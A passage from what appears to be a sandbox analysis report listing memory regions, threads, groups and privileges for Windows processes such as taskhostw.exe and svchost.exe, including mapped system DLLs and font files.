filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1993
start_va = 0x7ff8cecc0000
end_va = 0x7ff8ced6dfff
monitored = 0
entry_point = 0x7ff8cecd80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1994
start_va = 0x2300000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1995
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1999
start_va = 0x7ff8d3d50000
end_va = 0x7ff8d3d6bfff
monitored = 0
entry_point = 0x7ff8d3d537a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2000
start_va = 0xcd0000
end_va = 0xcdcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 2001
start_va = 0x1640000
end_va = 0x16bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001640000"
filename = ""
Region:
id = 2002
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 2003
start_va = 0x7ff8ce690000
end_va = 0x7ff8ce729fff
monitored = 0
entry_point = 0x7ff8ce6aada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2019
start_va = 0x1d00000
end_va = 0x1d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 2020
start_va = 0x7ff8ce4e0000
end_va = 0x7ff8ce59ffff
monitored = 0
entry_point = 0x7ff8ce50fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2021
start_va = 0xce0000
end_va = 0xce0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ce0000"
filename = ""
Region:
id = 2022
start_va = 0x7ff8ce480000
end_va = 0x7ff8ce4d1fff
monitored = 0
entry_point = 0x7ff8ce4838e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 2023
start_va = 0x7ff8ce450000
end_va = 0x7ff8ce47cfff
monitored = 0
entry_point = 0x7ff8ce452290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 2024
start_va = 0x7ff8ce440000
end_va = 0x7ff8ce448fff
monitored = 0
entry_point = 0x7ff8ce441ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 2025
start_va = 0x7ff8ce890000
end_va = 0x7ff8ce8c7fff
monitored = 0
entry_point = 0x7ff8ce8a8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2026
start_va = 0x7ff8ce430000
end_va = 0x7ff8ce43ffff
monitored = 0
entry_point = 0x7ff8ce431700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 2027
start_va = 0x7ff8d5db0000
end_va = 0x7ff8d5e35fff
monitored = 0
entry_point = 0x7ff8d5dbd8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2028
start_va = 0x7ff8d44f0000
end_va = 0x7ff8d4521fff
monitored = 0
entry_point = 0x7ff8d4502340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 2029
start_va = 0x7ff8ce310000
end_va = 0x7ff8ce31bfff
monitored = 0
entry_point = 0x7ff8ce312830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 2037
start_va = 0x7ff8ce2a0000
end_va = 0x7ff8ce2adfff
monitored = 0
entry_point = 0x7ff8ce2a1460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2154
start_va = 0x7ff8cf010000
end_va = 0x7ff8cf073fff
monitored = 0
entry_point = 0x7ff8cf025ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2165
start_va = 0x2400000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 2171
start_va = 0x7ff8d4660000
end_va = 0x7ff8d466bfff
monitored = 0
entry_point = 0x7ff8d4662790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 2196
start_va = 0x7ff8d5110000
end_va = 0x7ff8d511afff
monitored = 0
entry_point = 0x7ff8d51119a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2250
start_va = 0x7ff8d3bc0000
end_va = 0x7ff8d3d45fff
monitored = 0
entry_point = 0x7ff8d3c0d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2251
start_va = 0xce0000
end_va = 0xce3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2255
start_va = 0xcf0000
end_va = 0xd34fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 2256
start_va = 0xdd0000
end_va = 0xdd3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2257
start_va = 0x2500000
end_va = 0x258dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 2258
start_va = 0xde0000
end_va = 0xdf0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 2272
start_va = 0x2590000
end_va = 0x278ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 2273
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Thread:
id = 128
os_tid = 0x358
Thread:
id = 129
os_tid = 0x384
Thread:
id = 130
os_tid = 0x3c0
Thread:
id = 131
os_tid = 0x3d4
Thread:
id = 132
os_tid = 0x3d8
Thread:
id = 133
os_tid = 0x3dc
Thread:
id = 134
os_tid = 0x3e0
Thread:
id = 135
os_tid = 0x3ec
Thread:
id = 136
os_tid = 0x3f0
Thread:
id = 137
os_tid = 0x14c
Thread:
id = 138
os_tid = 0x150
Thread:
id = 139
os_tid = 0x154
Thread:
id = 140
os_tid = 0x8
Thread:
id = 141
os_tid = 0x1ac
Thread:
id = 142
os_tid = 0x260
Thread:
id = 143
os_tid = 0x2a4
Thread:
id = 144
os_tid = 0x2c4
Thread:
id = 145
os_tid = 0x2cc
Thread:
id = 146
os_tid = 0x2ec
Thread:
id = 147
os_tid = 0x258
Thread:
id = 148
os_tid = 0x2a4
Thread:
id = 149
os_tid = 0x40c
Thread:
id = 150
os_tid = 0x48c
Thread:
id = 151
os_tid = 0x4a0
Thread:
id = 152
os_tid = 0x474
Thread:
id = 170
os_tid = 0x558
Process:
id = "11"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x2f0f000"
os_pid = "0x490"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "10"
os_parent_pid = "0x354"
cmd_line = "taskhostw.exe SYSTEM"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae67" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2007
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2008
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2009
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2010
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2011
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2012
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2013
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2014
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2015
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2016
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2017
start_va = 0x7ff63ac70000
end_va = 0x7ff63ac88fff
monitored = 0
entry_point = 0x7ff63ac759b0
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 2018
start_va = 0x7ff8d9050000
end_va = 0x7ff8d9210fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2030
start_va = 0x400000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2031
start_va = 0x7ff8d7620000
end_va = 0x7ff8d76ccfff
monitored = 0
entry_point = 0x7ff8d76381a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2032
start_va = 0x7ff8d5f20000
end_va = 0x7ff8d6107fff
monitored = 0
entry_point = 0x7ff8d5f4ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2033
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2034
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2035
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2036
start_va = 0x7ff8d7580000
end_va = 0x7ff8d761cfff
monitored = 0
entry_point = 0x7ff8d75878a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2237
start_va = 0x520000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 2238
start_va = 0x7ff8d76f0000
end_va = 0x7ff8d780bfff
monitored = 0
entry_point = 0x7ff8d77302b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2239
start_va = 0x7ff8d7810000
end_va = 0x7ff8d7a8cfff
monitored = 0
entry_point = 0x7ff8d78e4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2240
start_va = 0x7ff8d6110000
end_va = 0x7ff8d6179fff
monitored = 0
entry_point = 0x7ff8d6146d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2241
start_va = 0x7ff8d6510000
end_va = 0x7ff8d65d0fff
monitored = 0
entry_point = 0x7ff8d6530da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2242
start_va = 0x1c0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2243
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2244
start_va = 0x5a0000
end_va = 0x6e2fff
monitored = 0
entry_point = 0x5c8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2245
start_va = 0x5a0000
end_va = 0x67cfff
monitored = 0
entry_point = 0x5fe0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2246
start_va = 0x7ff8d56e0000
end_va = 0x7ff8d56eefff
monitored = 0
entry_point = 0x7ff8d56e3210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2346
start_va = 0x7ff8d73b0000
end_va = 0x7ff8d7505fff
monitored = 0
entry_point = 0x7ff8d73ba8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2347
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2348
start_va = 0x1d0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2349
start_va = 0x7ff8d6ad0000
end_va = 0x7ff8d6c55fff
monitored = 0
entry_point = 0x7ff8d6b1ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2350
start_va = 0x5a0000
end_va = 0x727fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005a0000"
filename = ""
Region:
id = 2351
start_va = 0x730000
end_va = 0x8b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000730000"
filename = ""
Region:
id = 2352
start_va = 0x8c0000
end_va = 0x97ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Thread:
id = 153
os_tid = 0x494
Thread:
id = 173
os_tid = 0x57c
Process:
id = "12"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x34cfa000"
os_pid = "0x3b8"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "10"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xe], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d021" [0xc000000f], "LOCAL" [0x7]
Region:
id = 2038
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2039
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 2040
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2041
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2042
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2043
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2044
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2045
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2046
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2047
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2048
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2049
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2050
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2051
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2052
start_va = 0x480000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 2053
start_va = 0x540000
end_va = 0x540fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 2054
start_va = 0x550000
end_va = 0x556fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 2055
start_va = 0x560000
end_va = 0x574fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistbi.ttf"
filename = "\\Windows\\Fonts\\CALISTBI.TTF" (normalized: "c:\\windows\\fonts\\calistbi.ttf")
Region:
id = 2056
start_va = 0x580000
end_va = 0x58efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calisti.ttf"
filename = "\\Windows\\Fonts\\CALISTI.TTF" (normalized: "c:\\windows\\fonts\\calisti.ttf")
Region:
id = 2057
start_va = 0x590000
end_va = 0x59bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "castelar.ttf"
filename = "\\Windows\\Fonts\\CASTELAR.TTF" (normalized: "c:\\windows\\fonts\\castelar.ttf")
Region:
id = 2058
start_va = 0x5a0000
end_va = 0x5c7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "censcbk.ttf"
filename = "\\Windows\\Fonts\\CENSCBK.TTF" (normalized: "c:\\windows\\fonts\\censcbk.ttf")
Region:
id = 2059
start_va = 0x5e0000
end_va = 0x5f5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_i.ttf"
filename = "\\Windows\\Fonts\\BOD_I.TTF" (normalized: "c:\\windows\\fonts\\bod_i.ttf")
Region:
id = 2060
start_va = 0x600000
end_va = 0x6fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000600000"
filename = ""
Region:
id = 2061
start_va = 0x700000
end_va = 0x887fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 2062
start_va = 0x890000
end_va = 0x8a9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bradhitc.ttf"
filename = "\\Windows\\Fonts\\BRADHITC.TTF" (normalized: "c:\\windows\\fonts\\bradhitc.ttf")
Region:
id = 2063
start_va = 0x8b0000
end_va = 0x8b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 2064
start_va = 0x8c0000
end_va = 0x8d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_r.ttf"
filename = "\\Windows\\Fonts\\BOD_R.TTF" (normalized: "c:\\windows\\fonts\\bod_r.ttf")
Region:
id = 2065
start_va = 0x8e0000
end_va = 0x8e9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "britanic.ttf"
filename = "\\Windows\\Fonts\\BRITANIC.TTF" (normalized: "c:\\windows\\fonts\\britanic.ttf")
Region:
id = 2066
start_va = 0x8f0000
end_va = 0x8fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "broadw.ttf"
filename = "\\Windows\\Fonts\\BROADW.TTF" (normalized: "c:\\windows\\fonts\\broadw.ttf")
Region:
id = 2067
start_va = 0x900000
end_va = 0x9fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 2068
start_va = 0xa00000
end_va = 0xb80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 2069
start_va = 0xb90000
end_va = 0xc0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 2070
start_va = 0xc10000
end_va = 0xd0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c10000"
filename = ""
Region:
id = 2071
start_va = 0xd10000
end_va = 0xd27fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsb.ttf"
filename = "\\Windows\\Fonts\\BRLNSB.TTF" (normalized: "c:\\windows\\fonts\\brlnsb.ttf")
Region:
id = 2072
start_va = 0xd30000
end_va = 0xd47fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsdb.ttf"
filename = "\\Windows\\Fonts\\BRLNSDB.TTF" (normalized: "c:\\windows\\fonts\\brlnsdb.ttf")
Region:
id = 2073
start_va = 0xd50000
end_va = 0xd56fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d50000"
filename = ""
Region:
id = 2074
start_va = 0xd60000
end_va = 0xd77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsr.ttf"
filename = "\\Windows\\Fonts\\BRLNSR.TTF" (normalized: "c:\\windows\\fonts\\brlnsr.ttf")
Region:
id = 2075
start_va = 0xd80000
end_va = 0xd8dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brushsci.ttf"
filename = "\\Windows\\Fonts\\BRUSHSCI.TTF" (normalized: "c:\\windows\\fonts\\brushsci.ttf")
Region:
id = 2076
start_va = 0xd90000
end_va = 0xd9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bssym7.ttf"
filename = "\\Windows\\Fonts\\BSSYM7.TTF" (normalized: "c:\\windows\\fonts\\bssym7.ttf")
Region:
id = 2077
start_va = 0xda0000
end_va = 0xdb3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califb.ttf"
filename = "\\Windows\\Fonts\\CALIFB.TTF" (normalized: "c:\\windows\\fonts\\califb.ttf")
Region:
id = 2078
start_va = 0xdc0000
end_va = 0xdd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califi.ttf"
filename = "\\Windows\\Fonts\\CALIFI.TTF" (normalized: "c:\\windows\\fonts\\califi.ttf")
Region:
id = 2079
start_va = 0xde0000
end_va = 0xdf9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califr.ttf"
filename = "\\Windows\\Fonts\\CALIFR.TTF" (normalized: "c:\\windows\\fonts\\califr.ttf")
Region:
id = 2080
start_va = 0xe00000
